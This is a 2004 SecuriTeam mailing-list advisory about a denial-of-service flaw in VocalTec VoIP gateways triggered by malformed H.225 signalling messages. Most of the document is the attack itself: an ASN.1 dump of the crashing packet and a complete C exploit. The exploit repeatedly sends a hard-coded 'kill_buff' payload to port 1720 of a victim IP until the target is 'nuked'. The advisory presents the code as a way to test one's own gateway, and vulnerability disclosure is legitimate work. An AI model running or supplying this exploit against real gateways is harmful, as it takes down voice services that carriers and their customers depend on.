[NEWS] VocalTec VoIP Gateway (vtg120, vtg480) DoS
From: SecuriTeam (support_at_securiteam.com)
Date: 06/02/04
- Previous message: SecuriTeam: "[NT] TinyWeb Script Disclosure Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 2 Jun 2004 10:57:16 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
VocalTec VoIP Gateway (vtg120, vtg480) DoS
------------------------------------------------------------------------
SUMMARY
" <http://www.vocaltec.com/html/indexx/index-gateways.shtml> VocalTec
offers a diverse range of low and high density H.323 gateways, enabling
carriers to select equipment that is best suited for a particular
installation."
Attackers to cause a denial of service on the gateway machine by
exploiting problem in the way the gateways parses H.225 messages. Either
stopping of the vtgw-service or crashing of the host operating system is
possible.
DETAILS
Vulnerable Systems:
* Vocaltec VoIP Gateway vtg120, vtg480
Whenever the VocalTec gateway receives a packet containing the value:
tunnelledSignallingMessage c id = tunnelledProtocolAlternateID
It will fail to process the packet if the protocol identifier is H.225v4.
If more similar packets are received (about 10), a denial-of-service
condition occurs.
Either the service stops or crashes, or the operating system itself
suffers a crash.
An excerpt in ASN.1 notation of the offending message is shown below:
{
q931pdu = {
protocolDiscriminator = 8
callReference = 4
from = originator
messageType = Setup
IE: Bearer-Capability = {
80 90 a5 ...
}
IE: Calling-Party-Number = {
81 31 32 33 34 35 36 37 38 39 30 .1234567890
}
IE: Called-Party-Number = {
81 31 32 33 34 31 32 33 34 35 36 37 .12341234567
}
IE: User-User = { decode to h225pdu }
}
h225pdu = {
h323_uu_pdu = {
h323_message_body = setup {
protocolIdentifier = 0.0.8.2250.0.4 <<-------- H.225v4
sourceInfo = {
vendor = {
vendor = {
t35CountryCode = 1
t35Extension = 2
manufacturerCode = 3
}
}
gateway = {
protocol = 1 entries {
[0]=voice {
supportedPrefixes = 0 entries {
}
}
}
}
mc = FALSE
undefinedNode = FALSE
}
activeMC = FALSE
conferenceID = 16 octets {
61 62 63 64 65 66 67 68 61 62 63 64 65 66 67 68
}
conferenceGoal = create <<null>>
callType = pointToPoint <<null>>
sourceCallSignalAddress = ipAddress {
ip = 4 octets {
ac 10 01 01
}
port = 666
}
callIdentifier = {
guid = 16 octets {
62 62 63 64 65 66 67 68 61 62 63 64 65 66 67 68
}
}
fastStart = 2 entries {
[0]= 18 octets {
00 00 00 0d 40 01 80 0a 04 00 01 00 ac 10 01 01
47 f1
}
[1]= 29 octets {
40 00 00 06 04 01 00 4d 40 01 80 11 14 00 01 00
ac 10 01 01 47 f0 00 ac 10 01 01 47 f1
}
}
mediaWaitForConnect = FALSE
canOverlapSend = FALSE
multipleCalls = TRUE
maintainConnection = TRUE
symmetricOperationRequired = <<null>>
}
h245Tunneling = TRUE
nonStandardControl = 1 entries {
[0]={
nonStandardIdentifier = h221NonStandard {
t35CountryCode = 1
t35Extension = 2
manufacturerCode = 3
}
data = {...}
}
}
tunnelledSignallingMessage = {
tunnelledProtocolID = {
id = tunnelledProtocolAlternateID {
protocolType = "abcd"
}
}
messageContent = 1 entries {
[0]= {...}
}
}
}
}
}
Many modern VoIP gateways construct their packets in the above-mentioned
manner. It is safe to assume that other gateways are vulnerable to packets
such as those described. Below is an exploit code that sends a packet and
can be used to test your gateway:
Exploit:
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <fcntl.h>
#include <netdb.h>
#include <unistd.h>
#include <errno.h>
#define H323_SIGNAL_PORT 1720
unsigned char kill_buff[] = {\
0x03, 0x00, 0x01, 0x57, 0x08, 0x02, 0x00, 0x04, 0x05, 0x04, 0x03, 0x80,
0x90, 0xa5, 0x6c, 0x0b,
0x81, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x70,
0x0c, 0x81, 0x31, 0x32,
0x33, 0x34, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x7e, 0x01, 0x2b,
0x05, 0x20, 0x80, 0x06,
0x00, 0x08, 0x91, 0x4a, 0x00, 0x04, 0x28, 0x00, 0xb5, 0x00, 0x00, 0x12,
0x40, 0x01, 0x3c, 0x05,
0x01, 0x00, 0x00, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x61,
0x62, 0x63, 0x64, 0x65,
0x66, 0x67, 0x68, 0x00, 0x8d, 0x1d, 0x82, 0x07, 0x00, 0xac, 0x10, 0x01,
0x01, 0x02, 0x9a, 0x11,
0x00, 0x62, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x61, 0x62, 0x63,
0x64, 0x65, 0x66, 0x67,
0x68, 0x32, 0x02, 0x12, 0x00, 0x00, 0x00, 0x0d, 0x40, 0x01, 0x80, 0x0a,
0x04, 0x00, 0x01, 0x00,
0xac, 0x10, 0x01, 0x01, 0x47, 0xf1, 0x1d, 0x40, 0x00, 0x00, 0x06, 0x04,
0x01, 0x00, 0x4d, 0x40,
0x01, 0x80, 0x11, 0x14, 0x00, 0x01, 0x00, 0xac, 0x10, 0x01, 0x01, 0x47,
0xf0, 0x00, 0xac, 0x10,
0x01, 0x01, 0x47, 0xf1, 0x01, 0x00, 0x01, 0x00, 0x01, 0x80, 0x01, 0x80,
0x00, 0x0a, 0xa8, 0x01,
0x80, 0x6f, 0x01, 0x40, 0xb5, 0x00, 0x00, 0x12, 0x68, 0xe0, 0x01, 0x01,
0x00, 0x01, 0x1c, 0x58,
0x1c, 0x39, 0x9e, 0x01, 0x00, 0x03, 0x67, 0x74, 0x64, 0x00, 0x00, 0x00,
0x2e, 0x49, 0x41, 0x4d,
0x2c, 0x0d, 0x0a, 0x47, 0x43, 0x49, 0x2c, 0x33, 0x39, 0x61, 0x65, 0x65,
0x31, 0x35, 0x65, 0x62,
0x66, 0x31, 0x38, 0x31, 0x31, 0x64, 0x33, 0x38, 0x30, 0x30, 0x62, 0x64,
0x39, 0x63, 0x39, 0x65,
0x62, 0x30, 0x62, 0x31, 0x33, 0x35, 0x65, 0x0d, 0x0a, 0x0d, 0x0a, 0xa1,
0x04, 0x03, 0x90, 0x90,
0xa3, 0x18, 0x03, 0xa1, 0x83, 0x9f, 0x1e, 0x02, 0x81, 0x83, 0x70, 0x0c,
0x81, 0x37, 0x30, 0x39,
0x35, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x04, 0x80, 0x06, 0x00,
0x04, 0x00, 0x00, 0x00,
0x03, 0x35, 0x02, 0x04, 0x67, 0x74, 0x64, 0x01, 0x2e, 0x49, 0x41, 0x4d,
0x2c, 0x0d, 0x0a, 0x47,
0x43, 0x49, 0x2c, 0x33, 0x39, 0x61, 0x65, 0x65, 0x31, 0x35, 0x65, 0x62,
0x66, 0x31, 0x38, 0x31,
0x31, 0x64, 0x33, 0x38, 0x30, 0x30, 0x62, 0x64, 0x39, 0x63, 0x39, 0x65,
0x62, 0x30, 0x62, 0x31,
0x33, 0x35, 0x65, 0x0d, 0x0a, 0x0d, 0x0a};
int nuke_victim(char * ip)
{
int sock;
struct sockaddr_in vict_addr;
if ((sock=socket(AF_INET, SOCK_STREAM, 0))==-1)
{
perror("nuke_victim()::socket()");
return -1;
}
memset(&vict_addr, 0, sizeof(vict_addr));
vict_addr.sin_family=AF_INET;
inet_pton(AF_INET, ip, &vict_addr.sin_addr);
vict_addr.sin_port=htons(H323_SIGNAL_PORT);
if (connect(sock, (struct sockaddr *) &vict_addr, sizeof(vict_addr))==-1)
{
close(sock);
if (errno==ECONNREFUSED) return 1;
perror("nuke_victim()::connect()");
return -1;
}
if
(send(sock,kill_buff,sizeof(kill_buff),MSG_NOSIGNAL)!=sizeof(kill_buff))
{
close(sock);
if (errno==EPIPE) return 1;
perror("nuke_victim()::send()");
return -1;
}
close(sock);
return 0;
}
int main(int argc, char ** argv)
{
int ret_flag=0;
int try_count=0;
if (argc<2)
{
fprintf(stderr, "Usage: %s <victim IP>\n", argv[0]);
return 1;
}
while((ret_flag=nuke_victim(argv[1]))==0)
{
try_count++;
usleep(100000);
}
if (ret_flag==-1) printf("Execution aborted with internal error\n");
if (ret_flag==1) printf("Victim %s successfully nuked with %d tryes\n",
argv[1], try_count);
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:pk95@yandex.ru> Alexander.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] TinyWeb Script Disclosure Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
